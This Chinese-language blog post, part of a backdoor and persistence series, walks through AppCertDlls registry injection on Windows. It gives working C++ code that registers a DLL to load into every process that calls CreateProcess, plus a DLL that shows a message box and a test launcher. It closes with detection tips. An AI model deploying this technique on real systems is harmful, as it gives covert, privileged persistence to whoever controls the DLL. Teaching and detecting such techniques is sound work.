後門及持久化訪問2----進程注入之AppCertDlls 註冊表項

原創 浅笑⁹⁹⁶ 2020-07-01 17:17

代碼及原理介紹

如果有進程使用了CreateProcess、CreateProcessAsUser、CreateProcessWithLoginW、CreateProcessWithTokenW或WinExec

函數,那麼此進程會獲取HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\AppCertDlls註冊表項,此項下的dll都會加載到此進程。

Win7版本下沒有“AppCertDlls”項,需自己創建。

代碼如下:


#include <iostream> 
#include <Windows.h> 
using namespace std;

int test()
{
	DWORD dwDisposition;
	HKEY hKey;
	const char path[] = "C:\\dll.dll";
	RegCreateKeyExA(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCertDlls", 0, NULL, 0, KEY_WRITE, NULL, &hKey, &dwDisposition);
	RegSetValueExA(hKey, "Default", 0, REG_SZ, (BYTE*)path, (1 + ::lstrlenA(path)));
	return 0;
}

int main()
{
	test();
	//system("pause");
	return 0;
}

Dll代碼:


// dllmain.cpp : 定義 DLL 應用程序的入口點。
#include "stdafx.h"
BOOL TestMutex()
{
	HANDLE hMutex = CreateMutexA(NULL, false, "myself");
	if (GetLastError() == ERROR_ALREADY_EXISTS)
	{
		CloseHandle(hMutex);
		return 0;
	}
	return 1;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:  //進程創建執行
		if (TestMutex() == 0)
			return TRUE;
		MessageBoxA(0, "hello qianxiao996", "AppCert", 0);
	case DLL_THREAD_ATTACH:  //進=線程創建執行
	case DLL_THREAD_DETACH:  //進程結束執行
 	case DLL_PROCESS_DETACH: //線程結束執行
		break;
	}
	return TRUE;
}

復現過程

首先將代碼運行生成EXE和DLL,完整代碼在上面,將DLL文件名改爲dll.dll並放到相應路徑。

然後以管理員運行exe文件,發現已經創建註冊表

下面編寫一個創建進程的測試程序來打開notepad.exe,代碼如下


#include <iostream> 
#include <Windows.h> 
using namespace std;

int main()
{
	STARTUPINFO startupInfo = { 0 };
	PROCESS_INFORMATION processInformation = { 0 };

	BOOL bSuccess = CreateProcess(TEXT("C:\Windows\System32\notepad.exe"), NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &startupInfo, &processInformation);

	if (bSuccess)
	{
		cout << "Process started." << endl
			<< "Process ID:\t"
			<< processInformation.dwProcessId << endl;
	}
	else
	{
		cout << "Cannot start process!" << endl
			<< "Error code:\t" << GetLastError() << endl;
	}


	return system("pause");
}

當運行測試exe的時候創建了進程,便調用了dll.dll文件,彈出hello qianxiao996窗口。

檢查及清除方法

  • 監測dll的加載,特別是查找不是通常的dll,或者不是正常加載的dll。
  • 監視AppCertDLL註冊表值
  • 監視和分析註冊表編輯的API調用,如RegCreateKeyEx和RegSetValueEx。

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

後門及持久化訪問3----進程注入之AppInit_DLLs註冊表項

進程注入之AppInit_DLLs註冊表項 User32.dll被加載到進程時,會獲取AppInit_DLLs註冊表項,若有值,則調用LoadLibrary() API加載用戶DLL。只會影響加載了user32.dll的進程。 HKEY

浅笑⁹⁹⁶ 2020-07-01 17:17:22

後門及持久化訪問1----輔助功能鏡像劫持

代碼及原理介紹     爲了使電腦更易於使用和訪問,Windows添加了一些輔助功能。這些功能可以在用戶登錄之前以組合鍵啓動。根據這個特徵,一些惡意軟件無需登錄到系統,通過遠程桌面協議就可以執行惡意代碼。 一些常見的輔助功能如: C:\W

浅笑⁹⁹⁶ 2020-07-01 17:17:22

後門及持久化訪問4----Com組件劫持

代碼及原理介紹         COM是Component Object Model(組件對象模型)的縮寫,COM組件由DLL和EXE形式發佈的可執行代碼所組成。每個COM組件都有一個CLSID,這個CLSID是註冊的時候寫進註冊表的,可

浅笑⁹⁹⁶ 2020-07-01 17:17:22